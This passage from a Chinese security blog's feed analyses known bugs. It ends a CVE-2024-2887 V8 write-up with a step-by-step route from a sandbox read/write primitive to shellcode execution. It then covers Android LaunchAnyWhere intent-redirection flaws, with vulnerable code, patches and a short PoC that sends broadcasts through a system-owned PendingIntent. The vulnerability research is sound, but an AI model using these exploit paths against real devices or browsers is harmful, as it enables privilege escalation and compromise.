                a.UintPtrLessThanOrEqual(byte_offset, byte_length)) 
            .Then([&amp;amp;]() { 
                // length = floor((byte_length - byte_offset) / element_size) 
                return a.UintPtrDiv(a.UintPtrSub(byte_length, byte_offset),  
                                    a.ChangeUint32ToUintPtr(element_size)); 
            }) 
            .Else([&amp;amp;]() { return a.UintPtrConstant(0); })  
            .ExpectTrue() 
            .Value();  
    };  
 
     // 4) Length-tracking backed by GSAB (BackingStore stores the length) 
    auto GsabTracking = [&amp;amp;]() { 
        TNode&amp;lt;Number&amp;gt; temp = TNode&amp;lt;Number&amp;gt;::UncheckedCast(a.TypeGuard(  
                TypeCache::Get()-&amp;gt;kJSArrayBufferViewByteLengthType, 
                a.JSCallRuntime1(Runtime::kGrowableSharedArrayBufferByteLength, 
                                buffer, context, base::nullopt, 
                                Operator::kNoWrite))); 
            TNode&amp;lt;UintPtrT&amp;gt; byte_length = 
                a.EnterMachineGraph&amp;lt;UintPtrT&amp;gt;(temp, UseInfo::Word()); 
            TNode&amp;lt;UintPtrT&amp;gt; byte_offset = MachineLoadField&amp;lt;UintPtrT&amp;gt;( 
                AccessBuilder::ForJSArrayBufferViewByteOffset(), view, 
        UseInfo::Word());  
        // (2)  
        return a.UintPtrDiv(a.UintPtrSub(byte_length, byte_offset), 
                            a.ChangeUint32ToUintPtr(element_size));  
    };  
    ...  
} 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;对于&lt;code&gt;RAB ArrayBuffer&lt;/code&gt;数组，我们可以在(1)中看到长度的计算公式为&lt;code&gt;Floor((byte_length - byte_offset) / element_size)&lt;/code&gt;。但有一个下溢检查，即若&lt;code&gt;byte_offset &amp;gt; byte_length&lt;/code&gt;，则返回0。&lt;/p&gt;
&lt;p&gt;但对于&lt;code&gt;GSAB ArrayBuffer&lt;/code&gt;数组，缺少相应的下溢检查。因此，如果&lt;code&gt;byte_offset &amp;gt; byte_length&lt;/code&gt;，则会发生下溢，并且将返回接近&lt;code&gt;2^64&lt;/code&gt;的无符号64位整型值。由于这两个字段都能在攻击者控制的数组对象中找到，因此我们可以使用前面讨论的沙箱任意读/写原语轻松触发此操作，进而导致可访问整个64位地址空间。&lt;/p&gt;
&lt;h2&gt;3.4. 任意Shellcode执行&lt;/h2&gt;
&lt;p&gt;使用上述两个BUG，利用变得相当简单:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;通用&lt;code&gt;WebAssembly type confusion&lt;/code&gt;部分中描述的原语直接给出了V8内存沙箱的任意读/写。&lt;/li&gt;
&lt;li&gt;然后，将其用于操作&lt;code&gt;GSAB SharedArrayBuffer&lt;/code&gt;使其偏移量大于其长度。&lt;/li&gt;
&lt;li&gt;之后，可以使用&lt;code&gt;JIT&lt;/code&gt;编译的读/写函数来访问和覆盖进程地址空间中任何位置的数据。&lt;/li&gt;
&lt;li&gt;最后，&lt;code&gt;WebAssembly&lt;/code&gt;模块的编译代码是覆盖的合适目标，因为它在&lt;code&gt;RWX Page&lt;/code&gt;中，并且可以用&lt;code&gt;shellcode&lt;/code&gt;覆盖。&lt;/li&gt;
&lt;/ol&gt;
&lt;h1&gt;4. 参考资料&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2024-2887&quot;&gt;CVE-2024-2887 Detail - NVD&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.zerodayinitiative.com/blog/2024/5/2/cve-2024-2887-a-pwn2own-winning-bug-in-google-chrome&quot;&gt;CVE-2024-2887: A PWN2OWN WINNING BUG IN GOOGLE CHROME&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/v8/v8&quot;&gt;v8/v8: The official mirror of the V8 Git repository&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.google.com/document/d/1FM4fQmIhEqPG8uGp5o9A-mnPB5BOeScZYpkHjo0KKA8/edit#heading=h.xzptrog8pyxf&quot;&gt;V8 Sandbox - High-Level Design Doc&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://webassembly.github.io/gc/core/_download/WebAssembly.pdf&quot;&gt;WebAssembly Specification: Release 2.0 + tail calls + function references + gc (Draft 2024-04-28)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://stackoverflow.com/questions/17823225/do-arraybuffers-have-a-maximum-length&quot;&gt;javascript - Do ArrayBuffers have a maximum length? - Stack Overflow&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>LaunchAnyWhere漏洞分析</title><link>https://picoorg.github.io/posts/launchanywhere/</link><guid isPermaLink="true">https://picoorg.github.io/posts/launchanywhere/</guid><description>本文主要针对LaunchAnyWhere类型漏洞进行整理分析，最终形成一些静态分析规则形式的总结。</description><pubDate>Tue, 28 May 2024 00:00:00 GMT</pubDate><content:encoded>&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#1-%E6%A6%82%E8%BF%B0&quot;&gt;1. 概述&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#2-%E6%BC%8F%E6%B4%9E%E6%88%90%E5%9B%A0&quot;&gt;2. 漏洞成因&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#21-google-bug-7699048&quot;&gt;2.1. Google Bug 7699048&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#22-google-bug-17356824&quot;&gt;2.2. Google Bug 17356824&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#23-cve-2020-0144&quot;&gt;2.3. CVE-2020-0144&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#24-cve-2021-39707&quot;&gt;2.4. CVE-2021-39707&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#25-cve-2022-20223&quot;&gt;2.5. CVE-2022-20223&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#3-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8&quot;&gt;3. 漏洞利用&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#31-launch-a-component&quot;&gt;3.1. launch a component&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#32-return-data&quot;&gt;3.2. return data&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#4-%E5%8F%82%E8%80%83%E6%96%87%E7%AB%A0&quot;&gt;4. 参考文章&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h1&gt;1. 概述&lt;/h1&gt;
&lt;p&gt;&lt;code&gt;LaunchAnyWhere&lt;/code&gt;漏洞比较早的分析可以参考&lt;a href=&quot;http://retme.net/index.php/2014/08/20/launchAnyWhere.html&quot;&gt;retme的文章&lt;/a&gt;，后来Google给这种漏洞命名为&lt;a href=&quot;https://support.google.com/faqs/answer/9267555&quot;&gt;Intent Redirection&lt;/a&gt;。&lt;code&gt;LaunchAnyWhere&lt;/code&gt;顾名思义就是能够调用任意未导出的&lt;code&gt;Activity&lt;/code&gt;。&lt;/p&gt;
&lt;h1&gt;2. 漏洞成因&lt;/h1&gt;
&lt;h2&gt;2.1. &lt;a href=&quot;https://android.googlesource.com/platform/frameworks/base/+/5bab9da%5E%21/&quot;&gt;Google Bug 7699048&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;AccountManagerService&lt;/code&gt;是系统服务之一，暴露给开发者的的接口是&lt;code&gt;AccountManager&lt;/code&gt;。该服务用于管理用户各种网络账号。这使得一些应用可以获取用户网络账号的&lt;code&gt;token&lt;/code&gt;，并且使用&lt;code&gt;token&lt;/code&gt;调用一些网络服务。这种设计的本意是，&lt;code&gt;AccountManagerService&lt;/code&gt;帮助&lt;code&gt;AppA&lt;/code&gt;查找到&lt;code&gt;AppB&lt;/code&gt;账号登陆页面，并呼起这个登陆页面。而问题在于，&lt;code&gt;AppB&lt;/code&gt;可以任意指定这个&lt;code&gt;intent&lt;/code&gt;所指向的组件，&lt;code&gt;AppA&lt;/code&gt;将在不知情的情况下由&lt;code&gt;AccountManagerResponse&lt;/code&gt;调用起了一个&lt;code&gt;Activity&lt;/code&gt;。如果&lt;code&gt;AppA&lt;/code&gt;是一个system权限应用，比如Settings，那么&lt;code&gt;AppA&lt;/code&gt;能够调用起任意&lt;code&gt;AppB&lt;/code&gt;指定的未导出&lt;code&gt;Activity&lt;/code&gt;。&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;./20140820063530_23346.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt;
&lt;p&gt;此漏洞比较经典的流程图，当&lt;code&gt;AppA&lt;/code&gt;是&lt;code&gt;Settings&lt;/code&gt;，可以简单理解成以下流程：&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;code&gt;AppB&lt;/code&gt;调用&lt;code&gt;com.android.settings.accounts.AddAccountSettings&lt;/code&gt;，使Settings请求添加一个特定类型的网络账号&lt;/li&gt;
&lt;li&gt;系统查询到&lt;code&gt;AppB&lt;/code&gt;可以提供一个该类型的网络账号服务，系统向&lt;code&gt;AppB&lt;/code&gt;发起请求&lt;/li&gt;
&lt;li&gt;&lt;code&gt;AppB&lt;/code&gt;返回了一个&lt;code&gt;intent&lt;/code&gt;给系统，系统把&lt;code&gt;intent&lt;/code&gt;转发给&lt;code&gt;Settings&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;AccountManagerResponse&lt;/code&gt;在Settings的进程空间内调用&lt;code&gt;startActivity(intent)&lt;/code&gt;调起一个&lt;code&gt;Activity&lt;/code&gt;，&lt;code&gt;AccountManagerResponse&lt;/code&gt;是&lt;code&gt;FrameWork&lt;/code&gt;中的代码，&lt;code&gt;AppA&lt;/code&gt;对这一调用毫不知情。&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;最终关键触发点在此处&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/** Handles the responses from the AccountManager */
private class Response extends IAccountManagerResponse.Stub {
    public void onResult(Bundle bundle) {
        Intent intent = bundle.getParcelable(KEY_INTENT);
        if (intent != null &amp;amp;&amp;amp; mActivity != null) {
          // since the user provided an Activity we will silently start intents
          // that we see
          mActivity.startActivity(intent);
            // leave the Future running to wait for the real response to this request
            } else if (bundle.getBoolean(&quot;retry&quot;)) {
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;a href=&quot;https://android.googlesource.com/platform/frameworks/base/+/5bab9da%5E%21/#F0&quot;&gt;安卓4.4&lt;/a&gt;已经修复了这个漏洞，检查了Step3中返回的&lt;code&gt;intent&lt;/code&gt;所指向的&lt;code&gt;Activity&lt;/code&gt;和&lt;code&gt;AppB&lt;/code&gt;是否是有相同签名的。避免了&lt;code&gt;LaunchAnyWhere&lt;/code&gt;的可能。&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;+        @Override
         public void onResult(Bundle result) {
             mNumResults++;
-            if (result != null &amp;amp;&amp;amp; !TextUtils.isEmpty(result.getString(AccountManager.KEY_AUTHTOKEN))) {
+            Intent intent = null;
+            if (result != null
+                    &amp;amp;&amp;amp; (intent = result.getParcelable(AccountManager.KEY_INTENT)) != null) {
+                /*
+                 * The Authenticator API allows third party authenticators to
+                 * supply arbitrary intents to other apps that they can run,
+                 * this can be very bad when those apps are in the system like
+                 * the System Settings.
+                 */
+                PackageManager pm = mContext.getPackageManager();
+                ResolveInfo resolveInfo = pm.resolveActivity(intent, 0);
+                int targetUid = resolveInfo.activityInfo.applicationInfo.uid;
+                int authenticatorUid = Binder.getCallingUid();
+                if (PackageManager.SIGNATURE_MATCH !=
+                        pm.checkSignatures(authenticatorUid, targetUid)) {
+                    throw new SecurityException(
+                            &quot;Activity to be started with KEY_INTENT must &quot; +
+                            &quot;share Authenticator&apos;s signatures&quot;);
+                }
+            }
+            if (result != null
+                    &amp;amp;&amp;amp; !TextUtils.isEmpty(result.getString(AccountManager.KEY_AUTHTOKEN))) {
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;2.2. Google Bug 17356824&lt;/h2&gt;
&lt;p&gt;和&lt;a href=&quot;#google-bug-7699048&quot;&gt;Google Bug 7699048&lt;/a&gt;是同一个流程，但不同的是漏洞成因不同，这次是&lt;code&gt;Settings&lt;/code&gt;调用了&lt;code&gt;AccountManager.addAccount&lt;/code&gt;。在传递的&lt;code&gt;AddAccountOptions&lt;/code&gt;参数时加入了一个&lt;code&gt;PendingIntent&lt;/code&gt;，其&lt;code&gt;intent&lt;/code&gt;类型是&lt;code&gt;Broadcast&lt;/code&gt;。注意这个&lt;code&gt;PendingIntent&lt;/code&gt;是&lt;code&gt;Settings&lt;/code&gt;创建的，拥有system权限。&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;     private void addAccount(String accountType) {
         Bundle addAccountOptions = new Bundle();
         mPendingIntent = PendingIntent.getBroadcast(this, 0, new Intent(), 0);
         addAccountOptions.putParcelable(KEY_CALLER_IDENTITY, mPendingIntent);
         addAccountOptions.putBoolean(EXTRA_HAS_MULTIPLE_USERS, Utils.hasMultipleUsers(this));
         AccountManager.get(this).addAccount(
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;因为&lt;code&gt;Settings&lt;/code&gt;初始化&lt;code&gt;PendingIntent&lt;/code&gt;的时候传入的是一个没有内容的&lt;code&gt;new Intent()&lt;/code&gt;，所以攻击者在调用&lt;code&gt;PendingIntent.send()&lt;/code&gt;的时候可以随意设置&lt;code&gt;Intent&lt;/code&gt;中的大部分内容。这是由于在系统源码中&lt;code&gt;PendingIntentRecord.sendInner&lt;/code&gt;调用了&lt;code&gt;finalIntent.fillIn(intent, key.flags)&lt;/code&gt;，允许调用者填充&lt;code&gt;Intent&lt;/code&gt;的值。&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    int sendInner(int code, Intent intent, String resolvedType,
            IIntentReceiver finishedReceiver, String requiredPermission,
            IBinder resultTo, String resultWho, int requestCode,
            int flagsMask, int flagsValues, Bundle options) {
        synchronized(owner) {
            if (!canceled) {
                sent = true;
                if ((key.flags&amp;amp;PendingIntent.FLAG_ONE_SHOT) != 0) {
                    owner.cancelIntentSenderLocked(this, true);
                    canceled = true;
                }
                Intent finalIntent = key.requestIntent != null
                        ? new Intent(key.requestIntent) : new Intent();
                if (intent != null) {
                    int changes = finalIntent.fillIn(intent, key.flags);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;因此只要AppB在step3的时候取到了AddAccountOptions参数，从中获得了这个PendingIntent，并且可以利用它以system的身份发送广播，示例代码如下：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;PendingIntent pending_intent = (PendingIntent)options.get(&quot;pendingIntent&quot;);
intent.setAction(&quot;android.intent.action.BOOT_COMPLETED&quot;);
 
try {
         pending_intent.send(getGlobalApplicationContext(),0,intent,null,null,null);
} catch (CanceledException e) {
         e.printStackTrace();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;在此&lt;a href=&quot;https://android.googlesource.com/platform/packages/apps/Settings/+/37b58a4%5E%21/#F0&quot;&gt;补丁&lt;/a&gt;中填充了无意义的值，防止攻击者重新填充Intent&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;     private void addAccount(String accountType) {
         Bundle addAccountOptions = new Bundle();
-        mPendingIntent = PendingIntent.getBroadcast(this, 0, new Intent(), 0);
+        /*
+         * The identityIntent is for the purposes of establishing the identity
+         * of the caller and isn&apos;t intended for launching activities, services
+         * or broadcasts.
+         *
+         * Unfortunately for legacy reasons we still need to support this. But
+         * we can cripple the intent so that 3rd party authenticators can&apos;t
+         * fill in addressing information and launch arbitrary actions.
+         */
+        Intent identityIntent = new Intent();
+        identityIntent.setComponent(new ComponentName(SHOULD_NOT_RESOLVE, SHOULD_NOT_RESOLVE));
+        identityIntent.setAction(SHOULD_NOT_RESOLVE);
+        identityIntent.addCategory(SHOULD_NOT_RESOLVE);
+
+        mPendingIntent = PendingIntent.getBroadcast(this, 0, identityIntent, 0);
         addAccountOptions.putParcelable(KEY_CALLER_IDENTITY, mPendingIntent);
         addAccountOptions.putBoolean(EXTRA_HAS_MULTIPLE_USERS, Utils.hasMultipleUsers(this));
         AccountManager.get(this).addAccount(
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;2.3. &lt;a href=&quot;https://source.android.com/docs/security/bulletin/2020-06-01&quot;&gt;CVE-2020-0144&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;SliceProvider&lt;/code&gt;是自&lt;code&gt;Android P&lt;/code&gt;开始引入的一种应用程序间共享UI界面的机制，可以通过&lt;code&gt;SettingsSliceProvider&lt;/code&gt;中的&lt;code&gt;ContentProvider&lt;/code&gt;来共享给别的应用使用，用户不必打开&lt;code&gt;Settings&lt;/code&gt;，就可以在其他应用界面中对某些设置进行操作。&lt;/p&gt;
&lt;p&gt;关键漏洞位置在&lt;code&gt;frameworks/base/packages/SystemUI/src/com/android/systemui/keyguard/KeyguardSliceProvider.java&lt;/code&gt;生成了一个无&lt;code&gt;Package&lt;/code&gt;和&lt;code&gt;Action&lt;/code&gt;的&lt;code&gt;PendingIntent&lt;/code&gt;，具体代码如下&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public boolean onCreateSliceProvider() {
            ...
            mPendingIntent = PendingIntent.getActivity(getContext(), 0, new Intent(), 0);
            ...
        }
return true;
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;接下来通过父类&lt;code&gt;SliceProvider&lt;/code&gt;的&lt;code&gt;call&lt;/code&gt;方法返回包含该&lt;code&gt;Intent&lt;/code&gt;的&lt;code&gt;Bundle&lt;/code&gt;，具体代码如下：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@Override
    public Bundle call(String method, String arg, Bundle extras) {
        if (method.equals(METHOD_SLICE)) {
            Uri uri = getUriWithoutUserId(validateIncomingUriOrNull(
                    extras.getParcelable(EXTRA_BIND_URI)));
            List&amp;lt;SliceSpec&amp;gt; supportedSpecs = extras.getParcelableArrayList(EXTRA_SUPPORTED_SPECS);

            String callingPackage = getCallingPackage();
            int callingUid = Binder.getCallingUid();
            int callingPid = Binder.getCallingPid();

            Slice s = handleBindSlice(uri, supportedSpecs, callingPackage, callingUid, callingPid);
            Bundle b = new Bundle();
            b.putParcelable(EXTRA_SLICE, s);
            return b;
        } else if (method.equals(METHOD_MAP_INTENT)) {
            ...
        } else if (method.equals(METHOD_MAP_ONLY_INTENT)) {
            ...
        } else if (method.equals(METHOD_PIN)) {
            ...
        } else if (method.equals(METHOD_UNPIN)) {
            ...
        } else if (method.equals(METHOD_GET_DESCENDANTS)) {
            ...
        } else if (method.equals(METHOD_GET_PERMISSIONS)) {
            ...
        }
        return super.call(method, arg, extras);
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;难点在于如何拿到这个&lt;code&gt;PendingIntent&lt;/code&gt;，具体思路可以参考文章&lt;a href=&quot;https://paper.seebug.org/1269/#0x04-keyguardsliceprovider&quot;&gt;Android 中的特殊攻击面（三）—— 隐蔽的 call 函数&lt;/a&gt;。&lt;/p&gt;
&lt;p&gt;该漏洞&lt;a href=&quot;https://android.googlesource.com/platform/frameworks/base/+/d16e86f466c2fc18448b654cbe71089c7fede991%5E%21/#F0&quot;&gt;补丁&lt;/a&gt;相当于指定了Package，细节如下：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;             mZenModeController = new ZenModeControllerImpl(getContext(), mHandler);
             mZenModeController.addCallback(this);
             mDatePattern = getContext().getString(R.string.system_ui_aod_date_pattern);
-            mPendingIntent = PendingIntent.getActivity(getContext(), 0, new Intent(), 0);
+            mPendingIntent = PendingIntent.getActivity(getContext(), 0,
+                    new Intent(getContext(), KeyguardSliceProvider.class), 0);
             mMediaWakeLock = new SettableWakeLock(WakeLock.createPartial(getContext(), &quot;media&quot;),
                     &quot;media&quot;);
             KeyguardSliceProvider.sInstance = this;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;同样也有公开&lt;a href=&quot;https://github.com/tea9/CVE-2020-0114-systemui&quot;&gt;POC&lt;/a&gt;可以参考。&lt;/p&gt;
&lt;h2&gt;2.4. &lt;a href=&quot;https://source.android.com/docs/security/bulletin/2022-03-01&quot;&gt;CVE-2021-39707&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;最终漏洞触发位置在&lt;code&gt;com/android/settings/users/AppRestrictionsFragment.java&lt;/code&gt;，&lt;a href=&quot;https://android.googlesource.com/platform/packages/apps/Settings/+/refs/tags/android-12.0.0_r30/src/com/android/settings/users/AppRestrictionsFragment.java#630&quot;&gt;相关代码&lt;/a&gt;为：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public void onReceive(Context context, Intent intent) {
    Bundle results = getResultExtras(true);
    final ArrayList&amp;lt;RestrictionEntry&amp;gt; restrictions = results.getParcelableArrayList(
            Intent.EXTRA_RESTRICTIONS_LIST);
    Intent restrictionsIntent = results.getParcelable(CUSTOM_RESTRICTIONS_INTENT);
    if (restrictions != null &amp;amp;&amp;amp; restrictionsIntent == null) {
        onRestrictionsReceived(preference, restrictions);
        if (mRestrictedProfile) {
            mUserManager.setApplicationRestrictions(packageName,
                    RestrictionsManager.convertRestrictionsToBundle(restrictions), mUser);
        }
    } else if (restrictionsIntent != null) {
        preference.setRestrictions(restrictions);
        if (invokeIfCustom &amp;amp;&amp;amp; AppRestrictionsFragment.this.isResumed()) {
            assertSafeToStartCustomActivity(restrictionsIntent);
            int requestCode = generateCustomActivityRequestCode(
                    RestrictionsResultReceiver.this.preference);
            AppRestrictionsFragment.this.startActivityForResult(
                    restrictionsIntent, requestCode);
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;此漏洞是&lt;code&gt;assertSafeToStartCustomActivity&lt;/code&gt;校验不足产生的，相关代码：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private void assertSafeToStartCustomActivity(Intent intent) {
    // Activity can be started if it belongs to the same app
    if (intent.getPackage() != null &amp;amp;&amp;amp; intent.getPackage().equals(packageName)) {
        return;
    }
    // Activity can be started if intent resolves to multiple activities
    List&amp;lt;ResolveInfo&amp;gt; resolveInfos = AppRestrictionsFragment.this.mPackageManager
            .queryIntentActivities(intent, 0 /* no flags */);
    if (resolveInfos.size() != 1) {
        return;
    }
    // Prevent potential privilege escalation
    ActivityInfo activityInfo = resolveInfos.get(0).activityInfo;
    if (!packageName.equals(activityInfo.packageName)) {
        throw new SecurityException(&quot;Application &quot; + packageName
                + &quot; is not allowed to start activity &quot; + intent);
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;其中，正常情况下&lt;code&gt;resolveInfos.size() != 1&lt;/code&gt;可筛选出&lt;code&gt;Intent&lt;/code&gt;为多个目标的情况，触发用户选择的流程从而防止漏洞触发。但是&lt;code&gt;Activity&lt;/code&gt;在&lt;code&gt;Manifest&lt;/code&gt;中有一个配置叫做&lt;code&gt;android:priority&lt;/code&gt;，如果其中存在高优先级的Activity则会被直接选择，并不会触发用户选择的流程。但刚好&lt;code&gt;PrivilegedCallActivity&lt;/code&gt;符合利用场景，相关漏洞利用参考&lt;a href=&quot;https://www.freebuf.com/articles/mobile/348694.html&quot;&gt;CVE的别样发现之旅 | AOSP Bug Hunting with appshark&lt;/a&gt;。&lt;/p&gt;
&lt;p&gt;最终官方给出的&lt;a href=&quot;https://android.googlesource.com/platform/packages/apps/Settings/+/4fb753d22e6a2505b1667950d153bc03ad8ae422%5E%21/&quot;&gt;补丁&lt;/a&gt;代码如下：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;             if (intent.getPackage() != null &amp;amp;&amp;amp; intent.getPackage().equals(packageName)) {
                 return;
             }
-            // Activity can be started if intent resolves to multiple activities
-            List&amp;lt;ResolveInfo&amp;gt; resolveInfos = AppRestrictionsFragment.this.mPackageManager
-                    .queryIntentActivities(intent, 0 /* no flags */);
-            if (resolveInfos.size() != 1) {
-                return;
+            ResolveInfo resolveInfo = mPackageManager.resolveActivity(
+                    intent, PackageManager.MATCH_DEFAULT_ONLY);
+
+            if (resolveInfo == null) {
+                throw new ActivityNotFoundException(&quot;No result for resolving &quot; + intent);
             }
             // Prevent potential privilege escalation
-            ActivityInfo activityInfo = resolveInfos.get(0).activityInfo;
+            ActivityInfo activityInfo = resolveInfo.activityInfo;
             if (!packageName.equals(activityInfo.packageName)) {
                 throw new SecurityException(&quot;Application &quot; + packageName
                         + &quot; is not allowed to start activity &quot; + intent);
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;2.5. &lt;a href=&quot;https://source.android.com/docs/security/bulletin/2022-07-01&quot;&gt;CVE-2022-20223&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;漏洞利用流程和&lt;a href=&quot;#cve-2021-39707&quot;&gt;CVE-2021-39707&lt;/a&gt;类似，只不过是校验函数的二次绕过。&lt;/p&gt;
&lt;p&gt;由于&lt;code&gt;intent.getPackage()&lt;/code&gt;和&lt;code&gt;getPackageManager().resolveActivity(intent, PackageManager.MATCH_DEFAULT_ONLY).activityInfo.packageName&lt;/code&gt;获得packageName逻辑不一致，导致校验不足。其中&lt;code&gt;intent.getPackage()&lt;/code&gt;是针对&lt;code&gt;private String mPackage;&lt;/code&gt;，而&lt;code&gt;resolve&lt;/code&gt;方式是如果存在&lt;code&gt;private ComponentName mComponent;&lt;/code&gt;则取该值，否则取&lt;code&gt;mPackage&lt;/code&gt;。&lt;/p&gt;
&lt;p&gt;对应的&lt;a href=&quot;https://android.googlesource.com/platform/packages/apps/Settings/+/abadb382114fa8af5209295c9bae2ca2b08935f3%5E%21/#F0&quot;&gt;修复补丁&lt;/a&gt;也比较简单，代码如下：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;         private void assertSafeToStartCustomActivity(Intent intent) {
-            // Activity can be started if it belongs to the same app
-            if (intent.getPackage() != null &amp;amp;&amp;amp; intent.getPackage().equals(packageName)) {
-                return;
-            }
+            EventLog.writeEvent(0x534e4554, &quot;223578534&quot;, -1 /* UID */, &quot;&quot;);
             ResolveInfo resolveInfo = mPackageManager.resolveActivity(
                     intent, PackageManager.MATCH_DEFAULT_ONLY);
&lt;/code&gt;&lt;/pre&gt;
&lt;h1&gt;3. 漏洞利用&lt;/h1&gt;
&lt;h2&gt;3.1. launch a component&lt;/h2&gt;
&lt;p&gt;调用&lt;code&gt;startActivity&lt;/code&gt;, &lt;code&gt;startActivityForResult&lt;/code&gt;, &lt;code&gt;startService&lt;/code&gt;, &lt;code&gt;sendBroadcast&lt;/code&gt;时使用不可信的&lt;code&gt;intent&lt;/code&gt;，可能导致唤起私有的&lt;code&gt;Activity&lt;/code&gt;&lt;/p&gt;
&lt;h2&gt;3.2. return data&lt;/h2&gt;
&lt;p&gt;调用&lt;code&gt;setResult&lt;/code&gt;时使用不可信的&lt;code&gt;intent&lt;/code&gt;，可能导致&lt;code&gt;app&lt;/code&gt;隐私数据泄露&lt;/p&gt;
&lt;h1&gt;4. 参考文章&lt;/h1&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;http://retme.net/index.php/2014/08/20/launchAnyWhere.html&quot;&gt;launchAnyWhere: Activity组件权限绕过漏洞解析(Google Bug 7699048 )&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.freebuf.com/articles/mobile/348694.html&quot;&gt;CVE的别样发现之旅 | AOSP Bug Hunting with appshark (1): I... - FreeBuf网络安全行业门户&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://blog.lleavesg.top/article/LaunchAnyWhere&quot;&gt;LaunchAnyWhere漏洞分析&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://paper.seebug.org/1269/&quot;&gt;Android 中的特殊攻击面（三）—— 隐蔽的 call 函数&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;http://retme.net/index.php/2014/11/14/broadAnywhere-bug-17356824.html&quot;&gt;broadAnywhere：Broadcast组件权限绕过漏洞（Bug: 17356824）&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>OAuth2攻击面分析</title><link>https://picoorg.github.io/posts/oauth2%E6%94%BB%E5%87%BB%E9%9D%A2%E5%88%86%E6%9E%90/</link><guid isPermaLink="true">https://picoorg.github.io/posts/oauth2%E6%94%BB%E5%87%BB%E9%9D%A2%E5%88%86%E6%9E%90/</guid><description>本文主要梳理OAuth2常见攻击手段，并且结合实际案例进行分析。</description><pubDate>Tue, 07 May 2024 00:00:00 GMT</pubDate><content:encoded>&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#1-%E5%89%8D%E8%A8%80&quot;&gt;1. 前言&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#11-oauth-10%E6%BC%8F%E6%B4%9Esession-fixation-attack%E5%88%86%E6%9E%90&quot;&gt;1.1. OAuth 1.0漏洞(Session Fixation Attack)分析&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;#2-%E4%BB%80%E4%B9%88%E6%98%AFoauth2&quot;&gt;2. 什么是OAuth2&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;#21-%E8%A7%92%E8%89%B2&quot;&gt;2.1. 角色&lt;/a&gt;&lt;/li&gt;
